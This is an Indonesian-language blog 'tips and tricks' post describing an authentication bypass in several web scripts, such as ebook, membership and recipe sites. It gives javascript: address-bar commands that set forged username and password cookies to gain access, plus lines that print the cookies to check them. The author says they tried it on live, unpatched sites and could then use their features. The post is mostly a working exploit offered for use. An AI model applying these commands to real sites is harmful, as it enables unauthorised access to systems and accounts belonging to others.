lagi nyari informasi tentang sql injection trus “nyasar” ke sekuritionline … eh malah dapet informasi tentang javascript 
celah ini juga sudah di publish di beberapa website sekuriti lain, termasuk secunia.
berikut ini beberapa situs yang masih belum di patch waktu saya coba:
ebook
hotscripts
rss
membership
recipe
cukup masukan javascript berikut ke address bar di browser:
javascript:document.cookie = “username=kanabies; path=/”;
javascript:document.cookie = “password=kanabies; path=/”;
perintah itu akan membuat username dan password: kanabies
hal ini bisa dicek dengan memasukan salah satu syntax berikut ke address bar di browser:
javascript:alert(document.cookie)
javascript:alert(unescape(document.cookie))
javascript:alert(unescape(document.cookie).replace(/;/gi,”\n\n”))
javascript:alert(unescape(unescape(document.cookie)).replace(/;/gi,”\n\n”))
setelah itu kita bisa masuk ke menu yang ada dan menjalankan perintah/fitur yand ada
di firefox ada addon yang khusus untuk mengedit cookies:
firefox-addons
CMIIW,
ga ada sql … javascript pun jadi
sumber:
sekuritionline
jammed
javaranch
Filed under: Tips&Trick
